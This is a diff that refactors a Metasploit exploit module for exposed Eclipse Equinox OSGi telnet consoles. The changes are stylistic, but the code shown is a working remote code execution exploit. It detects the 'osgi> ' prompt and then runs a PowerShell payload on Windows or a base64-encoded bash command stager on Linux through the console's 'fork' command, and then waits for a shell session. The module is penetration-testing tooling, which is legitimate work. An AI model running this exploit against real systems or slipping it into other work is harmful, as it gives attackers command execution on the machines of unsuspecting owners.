@@ -29,7 +29,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
         ],
-        'Platform' => %w{linux win},
         'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
         'Targets' => [
           [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
@@ -64,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
       res = sock.get_once
     end
     disconnect
-    if res && res == "osgi> "
+    if res && res == 'osgi> '
       return Exploit::CheckCode::Vulnerable
     end
 
@@ -72,31 +71,29 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    begin
-      print_status("Accessing the OSGi console ...")
+    print_status('Accessing the OSGi console ...')
 
-      unless check == Exploit::CheckCode::Vulnerable
-        fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
-      end
-
-      if target['Platform'] == "win" then
-        exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, { encode_final_payload: true, remove_comspec: true })}\"")
-      else
-        execute_cmdstager({ :flavor => :bourne })
-      end
-
-      print_status("#{rhost}:#{rport} - Waiting for session...")
-
-      (datastore['TIME_WAIT']).times do
-        Rex.sleep(1)
-        # Success! session is here!
-        break if session_created?
-      end
-    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
-    ensure
-      disconnect
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
     end
+
+    if target['Platform'] == 'win'
+      exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, { encode_final_payload: true, remove_comspec: true })}\"")
+    else
+      execute_cmdstager({ flavor: :bourne })
+    end
+
+    print_status("#{rhost}:#{rport} - Waiting for session...")
+
+    (datastore['TIME_WAIT']).times do
+      Rex.sleep(1)
+      # Success! session is here!
+      break if session_created?
+    end
+  rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
+    fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
+  ensure
+    disconnect
   end
 
   def exec_command(cmd)
@@ -108,18 +105,18 @@ class MetasploitModule < Msf::Exploit::Remote
               TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE
       sock.put(TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE + \
         "\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE)
-      res = sock.get_once
+      sock.get_once
     end
-    print_status("Exploiting...")
+    print_status('Exploiting...')
     sock.put("#{cmd}\r\n")
-    res = sock.get
+    sock.get
     sock.put("disconnect\r\n")
-    res = sock.get
+    sock.get
     sock.put("y\r\n")
   end
 
-  def execute_command(cmd, opts = {})
-    cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
+  def execute_command(cmd, _opts = {})
+    cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, '')
     # Runtime.getRuntime().exec() workaround on Linux. Requires bash.
     exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
   end
